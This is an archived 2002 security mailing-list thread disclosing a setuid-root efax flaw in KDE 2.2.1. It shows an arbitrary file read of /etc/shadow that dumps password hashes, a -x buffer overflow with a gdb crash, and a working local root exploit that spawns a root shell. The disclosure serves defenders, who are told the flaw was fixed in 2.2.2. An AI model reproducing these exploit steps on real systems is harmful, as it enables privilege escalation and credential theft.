Re: efax

From: H D Moore (sflistat_private)
Date: Wed Jan 16 2002 - 01:55:27 PST

  • Next message: s1gnal_9 : "Re: efax" 

    Since this is getting cc'd to butraq, here is a little background:

The version of efax I have was part of a kde-2.2.1 source build and install. 
The efax program was shipped as part of the klprfax app in the kdeutils
package. The makefile sets this binary to be setuid root on install:

hdm@sliver:~/kdeutils-2.2.1/klprfax > grep chown . -r
./efax/fax:     case $OWNER in '') ;; *) chown $OWNER /dev/$DEV ;; esac
./efax/Makefile:        @(chown root $(bindir)/efax && chmod 4755 $(bindir)/efax) || echo "Was not able to make efax setuid root"
./efax/Makefile.am:     @(chown root $(bindir)/efax && chmod 4755 $(bindir)/efax) || echo "Was not able to make efax setuid root"
./efax/Makefile.in:     @(chown root $(bindir)/efax && chmod 4755 $(bindir)/efax) || echo "Was not able to make efax setuid root"
./klprfax/klprfax_lpd.in:    chown root $SPOOL/klprfax
./klprfax/klprfax_lpd:    chown root $SPOOL/klprfax
hdm@sliver:~/kdeutils-2.2.1/klprfax >

This has been fixed in KDE 2.2.2 and I have not seen a distro yet that ships 
with efax installed suid root. However, if you installed KDE 2.2.1 from source,
then there is a good chance your efax binary is still setuid.

I posted a message to vuln-dev, stating that I found a setuid copy of efax and
that I was able to read arbitrary files with the -d parameter (/etc/shadow), 
Wodahs responded saying he found an overflow in the -x parameter.

The overflow that he found is easily exploitable:

Running /bin/id:

hdm@sliver> efax -x $EX
efax: Wed Jan 16 03:43:10 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: Wed Jan 16 03:43:10 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: 43:10 compiled Aug 16 2001 10:23:23
efax: 43:10 Error: can't open pre-lock file <nops>^)FF
                     
                       S
                            ̀)@̀/bin/idA/TMP..08795: File name too long
uid=500(hdm) gid=100(users) euid=0(root) groups=100(users)


Getting a root shell:

hdm@sliver > echo 'void main(void){setuid(0);system("/bin/sh");}' > /tmp/ex.c
hdm@sliver > gcc -o /tmp/ex /tmp/ex.c
/tmp/ex.c: In function `main':
/tmp/ex.c:1: warning: return type of `main' is not `int'
hdm@sliver > export EX=`perl genshell.pl 1029 $ADDR`
shell code is: 43 bytes
hdm@sliver > efax -x $EX
efax: Wed Jan 16 03:46:21 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: Wed Jan 16 03:46:21 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
efax: 46:21 compiled Aug 16 2001 10:23:23
efax: 46:21 Error: can't open pre-lock file <nops>^)FF
                     
                       S
                            ̀)@̀/tmp/exA/TMP..08846: File name too long
sh-2.04#

On Wednesday 16 January 2002 03:03 am, Wodahs Latigid wrote:
> I found a buffer overflow in efax a while back,
> reported it and didn't get a response. Here's
> the original email:
> -----------------------------------------------
> To: edcat_private
> Subject: Efax Buffer Overflow
> You may or not be interested (as this has no
> major impact on the outside world), but there
> is a buffer overflow in the -x function of
> efax. Obviously, efax should not be setuid
> root, but I can imagine a situation with an
> administrator doing so to give "trusted" users
> access to the fax facility.
> -----------------------------------------------
>
> And here's more detail:
>
> # cat /etc/mandrake-release
> Linux Mandrake release 8.0 (Traktopel) for i586
>
> Starting program: /usr/bin/efax -x `perl -e "print 'A' x 1200"`
> /usr/bin/efax: Wed Jan 16 09:54:49 2002 efax v 0.9 Copyright 1999 Ed Casas
> efax: 54:49 Error: can't open pre-lock file AAAA..[A's
> Cut]..AAAATMP..25717: File name too long Program received signal SIGSEGV,
> Segmentation fault.
> 0x41414141 in ?? ()
> (gdb) inf reg
> .. stuff cut ..
> edx            0x65656565       1701143909
> ebx            0x41414141       1094795585
> esp            0xbffefd58       0xbffefd58
> ebp            0x41414141       0x41414141
> esi            0x41414141       1094795585
> edi            0x41414141       1094795585
> eip            0x41414141       0x41414141
> .. stuff cut ..
>
> Digital Shadow
> http://www.ministryofpeace.co.uk/
>
>
>
> -----Original Message-----
> From: H D Moore <sflistat_private>
> Date: Tue, 15 Jan 2002 18:44:57 -0600
> To: VULN-DEVat_private
> Subject: efax
>
> > Didn't see this mentioned before...
> >
> > hdm@sliver:~ > which efax
> > /opt/kde2/bin/efax
> > hdm@sliver:~ > ls -la /opt/kde2/bin/efax
> > -rwsr-xr-x    1 root     root        96689 Aug 16 10:23
> > /opt/kde2/bin/efax hdm@sliver:~ > efax -h
> > efax: Tue Jan 15 18:43:28 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
> > efax: Tue Jan 15 18:43:28 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
> > efax: 43:28 compiled Aug 16 2001 10:23:23
> > efax: 43:28 Error: no argument for (-h)
> > Usage:
> >   efax [ option ]... [ -t num [ file... ] ]
> > Options:
> >   -a str  use command ATstr to answer
> >   -c cap  set modem and receive capabilites to cap
> >   -d dev  use modem on device dev
> >   -e cmd  exec "/bin/sh -c cmd" for voice calls
> >   -f fnt  use (PBM) font file fnt for headers
> >   -g cmd  exec "/bin/sh -c cmd" for data calls
> >   -h hdr  use page header hdr (use %d's for current page/total pages)
> >   -i str  send modem command ATstr at start
> >   -j str  send modem command ATstr after set fax mode
> >   -k str  send modem command ATstr when done
> >   -l id   set local identification to id
> >   -o opt  use protocol option opt:
> >       0     use class 2.0 instead of class 2 modem commands
> >       1     use class 1 modem commands
> >       2     use class 2 modem commands
> >       a     if first [data mode] answer attempt fails retry as fax
> >       e     ignore errors in modem initialization commands
> >       f     use virtual flow control
> >       h     use hardware flow control
> >       l     halve lock file polling interval
> >       n     ignore page retransmission requests
> >       r     do not reverse received bit order for Class 2 modems
> >       x     use XON instead of DC2 to trigger reception
> >       z     add 100 ms to pause before each modem comand (cumulative)
> >   -q ne   ask for retransmission if more than ne errors per page
> >   -r pat  save received pages into files pat.001, pat.002, ...
> >   -s      share (unlock) modem device while waiting for call
> >   -v lvl  print messages of type in string lvl (ewinchamr)
> >   -w      don't answer phone, wait for OK or CONNECT instead
> >   -x fil  use uucp-style lock file fil
> > Commands:
> >   -t      dial num and send fax image files file...
> > efax: 43:28 done, returning 2 (unrecoverable error)
> > hdm@sliver:~ > efax -d /etc/shadow
> > efax: Tue Jan 15 18:43:35 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
> > efax: Tue Jan 15 18:43:35 2002 efax v 0.9a-001114 Copyright 1999 Ed Casas
> > efax: 43:35 compiled Aug 16 2001 10:23:23
> > efax: 43:35 opened /etc/shadow
> > efax: 43:35 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for
> > device efax: 43:35 Warning: unexpected response
> > "root:sjSs9mscTsosA:11521:0:10000::::" efax: 43:35 Warning: unexpected
> > response "bin:*:8902:0:10000::::" efax: 43:35 Warning: unexpected
> > response "daemon:*:8902:0:10000::::" efax: 43:35 Warning: unexpected
> > response "lp:*:9473:0:10000::::" efax: 43:35 Warning: unexpected response
> > "news:*:8902:0:10000::::" efax: 43:35 Warning: unexpected response
> > "uucp:*:0:0:10000::::"
> > efax: 43:35 Warning: unexpected response "games:*:0:0:10000::::"
> > efax: 43:35 Warning: unexpected response "man:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "at:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "lnx:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "mdom:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "yard:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "wwwrun:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "squid:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "postgres:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "fax:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "gnats:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "empress:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "adabas:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "amanda:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "ixess:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "irc:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "ftp:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "firewall:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "informix:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "named:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "virtuoso:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "fnet:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "gdm:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "postfix:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "cyrus:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "nps:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "skyrix:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "dbmaker:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "fixadm:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "fib:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "fixlohn:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "mysql:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "dpbox:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "ingres:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "codadmin:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "zope:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "vscan:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "wnn:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "pop:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "perforce:*:8902:0:10000::::"
> > efax: 43:35 Warning: unexpected response "nobody:*:0:0:10000::::"
> > efax: 43:35 Warning: unexpected response
> > "hdm:snBsN0stfzsMg:11564:0:99999:7:0::" efax: 43:35 Warning: unexpected
> > response "oracle:!:11556:0:99999:3:0::" efax: 43:35 Warning: unexpected
> > response "yaku:!:11636:0:99999:3:0::" efax: 43:35 Error: tcgetattr on
> > fd=3 failed: Inappropriate ioctl for device efax: 43:35 sync: dropping
> > DTR
> > efax: 43:35 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for
> > device efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl
> > for device efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate
> > ioctl for device efax: 43:36 sync: sending escapes
> > efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for
> > device efax: 43:36 Error: tcgetattr on fd=3 failed: Inappropriate ioctl
> > for device efax: 43:37 Error: sync: modem not responding
> > efax: 43:37 Error: tcgetattr on fd=3 failed: Inappropriate ioctl for
> > device efax: 43:37 done, returning 2 (unrecoverable error)
> >
> > --
> > H D Moore
> > http://www.digitaldefense.net - work
> > http://www.digitaloffense.net - play

-- 
H D Moore
http://www.digitaldefense.net - work
http://www.digitaloffense.net - play

    This archive was generated by hypermail 2b30 : Wed Jan 16 2002 - 18:18:36 PST